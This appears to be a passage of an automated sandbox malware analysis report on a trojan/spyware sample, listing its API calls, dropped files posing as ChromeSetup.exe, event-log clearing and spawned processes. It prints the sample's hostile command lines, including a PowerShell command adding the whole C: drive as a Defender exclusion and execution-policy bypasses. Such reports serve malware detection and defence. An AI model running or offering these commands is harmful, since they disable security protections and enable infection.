                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D0E850 Sleep,CreateMutexW,GetLastError,_memset,Sleep,GetTickCount,GetTickCount,GetTickCount,InterlockedExchange,OpenClipboard,GetClipboardData,GlobalSize,GlobalLock,wsprintfW,_memset,GlobalUnlock,CloseClipboard,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,GetKeyState,lstrlenW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,wsprintfW,wsprintfW,lstrlenW,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,6_2_02D0E850
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D0BC70 GetDesktopWindow,GetDC,GetDC,CreateCompatibleDC,GetDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,ReleaseDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,CreateCompatibleBitmap,SelectObject,SetStretchBltMode,GetSystemMetrics,GetSystemMetrics,StretchBlt,_memset,GetDIBits,_memset,DeleteObject,DeleteObject,ReleaseDC,DeleteObject,DeleteObject,ReleaseDC,6_2_02D0BC70
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D0E4F0 Sleep,CreateMutexW,GetLastError,SHGetFolderPathW,lstrcatW,CreateMutexW,WaitForSingleObject,CreateFileW,GetFileSize,CloseHandle,DeleteFileW,ReleaseMutex,DirectInput8Create,GetTickCount,GetKeyState,6_2_02D0E4F0
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeWindows user hook set: 0 mouse low level C:\Windows\SYSTEM32\DINPUT8.dll
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeProcess Stats: CPU usage > 49%
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeCode function: 0_2_008D18A7 GetModuleHandleA,CreateWindowExW,SendMessageW,CreateThread,PostQuitMessage,NtdllDefWindowProc_W,0_2_008D18A7
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D0B463 ExitWindowsEx,6_2_02D0B463
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D0B41B ExitWindowsEx,6_2_02D0B41B
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D0B43F ExitWindowsEx,6_2_02D0B43F
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: String function: 02833CBF appears 33 times
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: String function: 02D14300 appears 32 times
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: String function: 03FB85BB appears 33 times
                      Source: FIWszl1A8l.exeStatic PE information: invalid certificate
                      Source: FIWszl1A8l.exeStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                      Source: FIWszl1A8l.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                      Source: ChromeSetup[1].exe.0.drStatic PE information: Resource name: B7 type: 7-zip archive data, version 0.4
                      Source: ChromeSetup[1].exe.0.drStatic PE information: Resource name: RT_STRING type: CLIPPER COFF executable (VAX #) not stripped - version 71
                      Source: ChromeSetup.exe.0.drStatic PE information: Resource name: B7 type: 7-zip archive data, version 0.4
                      Source: ChromeSetup.exe.0.drStatic PE information: Resource name: RT_STRING type: CLIPPER COFF executable (VAX #) not stripped - version 71
                      Source: FIWszl1A8l.exe, 00000000.00000000.1315475964.00000000006F4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName vs FIWszl1A8l.exe
                      Source: FIWszl1A8l.exe, 00000000.00000003.1366103357.00000000029D9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs FIWszl1A8l.exe
                      Source: FIWszl1A8l.exe, 00000000.00000002.1737241689.0000000000D78000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekernel32j% vs FIWszl1A8l.exe
                      Source: FIWszl1A8l.exe, 00000006.00000002.3785160100.0000000000C98000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekernel32j% vs FIWszl1A8l.exe
                      Source: FIWszl1A8l.exeBinary or memory string: OriginalFileName vs FIWszl1A8l.exe
                      Source: FIWszl1A8l.exe.0.drBinary or memory string: OriginalFileName vs FIWszl1A8l.exe
                      Source: FIWszl1A8l.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@29/27@1/2
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D07B70 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,6_2_02D07B70
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D07620 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,OpenProcess,6_2_02D07620
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D07740 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,6_2_02D07740
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D06C50 wsprintfW,MultiByteToWideChar,GetDriveTypeW,GetDiskFreeSpaceExW,_memset,GlobalMemoryStatusEx,swprintf,swprintf,6_2_02D06C50
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeCode function: 0_2_10001FA0 CreateToolhelp32Snapshot,memset,Process32FirstW,WideCharToMultiByte,CloseHandle,Process32NextW,CloseHandle,0_2_10001FA0
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeCode function: 0_2_10002090 InternetOpenA,InternetOpenUrlA,fopen,HttpQueryInfoW,SendMessageW,InternetReadFile,fwrite,SendMessageW,fclose,InternetCloseHandle,InternetCloseHandle,GetParent,ShowWindow,WaitForSingleObject,CoInitializeEx,CoCreateInstance,Sleep,Sleep,exit,0_2_10002090
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeFile created: C:\Users\user\AppData\Roaming\FIWszl1A8l.exe
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8084:120:WilError_03
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeMutant created: \Sessions\1\BaseNamedObjects\2024.12.28
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7636:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2368:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:344:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7940:120:WilError_03
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeMutant created: \Sessions\1\BaseNamedObjects\VJANCAVESU
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeFile created: C:\Users\user\AppData\Local\Temp\PolicyManagement.xml
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeFile read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: FIWszl1A8l.exeVirustotal: Detection: 45%
                      Source: FIWszl1A8l.exeReversingLabs: Detection: 31%
                      Source: FIWszl1A8l.exeString found in binary or memory: -Helper process exited with failure code: 0x%x
                      Source: FIWszl1A8l.exeString found in binary or memory: -HelperRegisterTypeLibrary: StatusCode invalidU
                      Source: FIWszl1A8l.exeString found in binary or memory: /InstallOnThisVersion: Invalid MinVersion string
                      Source: FIWszl1A8l.exeString found in binary or memory: /LoadInf=
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeFile read: C:\Users\user\Desktop\FIWszl1A8l.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\FIWszl1A8l.exe "C:\Users\user\Desktop\FIWszl1A8l.exe"
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeProcess created: C:\Users\user\AppData\Roaming\FIWszl1A8l.exe "C:\Users\user\AppData\Roaming\FIWszl1A8l.exe"
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exe Process created: C:\Users\user\AppData\Roaming\FIWszl1A8l.exe "C:\Users\user\AppData\Roaming\FIWszl1A8l.exe"
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: FIWszl1A8l.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                      Source: FIWszl1A8l.exeStatic file information: File size 3213672 > 1048576
                      Source: FIWszl1A8l.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x2c2200
                      Source: FIWszl1A8l.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                      Source: Binary string: UpdaterSetup.exe.pdb source: ChromeSetup[1].exe.0.dr, ChromeSetup.exe.0.dr
                      Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbBQ source: powershell.exe, 0000000D.00000002.1442464615.0000000006FC5000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbw source: powershell.exe, 0000000D.00000002.1442901248.0000000007013000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.1416194201.0000000002A77000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \Release\Code_Shellcode.pdb source: FIWszl1A8l.exe, FIWszl1A8l.exe, 00000000.00000002.1734162605.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, FIWszl1A8l.exe, 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                      Source: Binary string: \Release\Code_Shellcode.pdb,''GCTL source: FIWszl1A8l.exe, 00000000.00000002.1734162605.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, FIWszl1A8l.exe, 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbl source: powershell.exe, 0000000D.00000002.1442901248.0000000007013000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: UpdaterSetup.exe.pdbP source: ChromeSetup[1].exe.0.dr, ChromeSetup.exe.0.dr
                      Source: Binary string: updater.exe.pdb source: ChromeSetup[1].exe.0.dr, ChromeSetup.exe.0.dr
                      Source: Binary string: updater.exe.pdbP source: ChromeSetup[1].exe.0.dr, ChromeSetup.exe.0.dr

                      Data Obfuscation

                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeUnpacked PE file: 0.2.FIWszl1A8l.exe.400000.0.unpack
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D07490 wsprintfW,LoadLibraryW,GetProcAddress,MultiByteToWideChar,swprintf,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,FreeLibrary,6_2_02D07490
                      Source: FIWszl1A8l.exe.0.drStatic PE information: real checksum: 0x318112 should be: 0x318989
                      Source: FIWszl1A8l.exeStatic PE information: real checksum: 0x318112 should be: 0x318989
                      Source: FIWszl1A8l.exeStatic PE information: section name: .didata
                      Source: FIWszl1A8l.exe.0.drStatic PE information: section name: .didata
                      Source: ChromeSetup[1].exe.0.drStatic PE information: section name: CPADinfo
                      Source: ChromeSetup[1].exe.0.drStatic PE information: section name: malloc_h
                      Source: ChromeSetup.exe.0.drStatic PE information: section name: CPADinfo
                      Source: ChromeSetup.exe.0.drStatic PE information: section name: malloc_h
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_044B632D push eax; ret 4_2_044B6341
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_044B3ACD push ebx; retf 4_2_044B3ADA
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_3_03FB8600 push ecx; ret 6_3_03FB8613
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D14345 push ecx; ret 6_2_02D14358
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D2A0B8 push eax; ret 6_2_02D2A119
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D2A168 push eax; ret 6_2_02D2A119
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D22450 push ebp; retf 6_2_02D22474
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D22470 push ebp; retf 6_2_02D22474
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D22471 push ebp; retf 6_2_02D22474
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_00979DF5 push ecx; ret 6_2_00979E08
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_0098FE9A push ecx; ret 6_2_0098FEBF
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_0092CAFF push eax; retf 6_2_0092CB00
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_0092CB07 pushad ; retf 6_2_0092CB08
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_0092CB0B push 701000CBh; retf 6_2_0092CB10
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_0092CB61 pushfd ; retf 6_2_0092CB64
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_00929DCC push ecx; ret 6_2_00929DDF
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02833D04 push ecx; ret 6_2_02833D17
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_02C799C5 push esp; iretd 13_2_02C799C9
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeFile created: C:\Users\user\Downloads\ChromeSetup.exe
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeFile created: C:\Users\user\AppData\Roaming\FIWszl1A8l.exe
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\ChromeSetup[1].exe

                      Hooking and other Techniques for Hiding and Protection

                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D0B3C0 OpenEventLogW,OpenEventLogW,ClearEventLogW,CloseEventLog,6_2_02D0B3C0
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeKey value created or modified: HKEY_CURRENT_USER\Console\0 9e9e85e05ee16fc372a0c7df6549fbd4
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
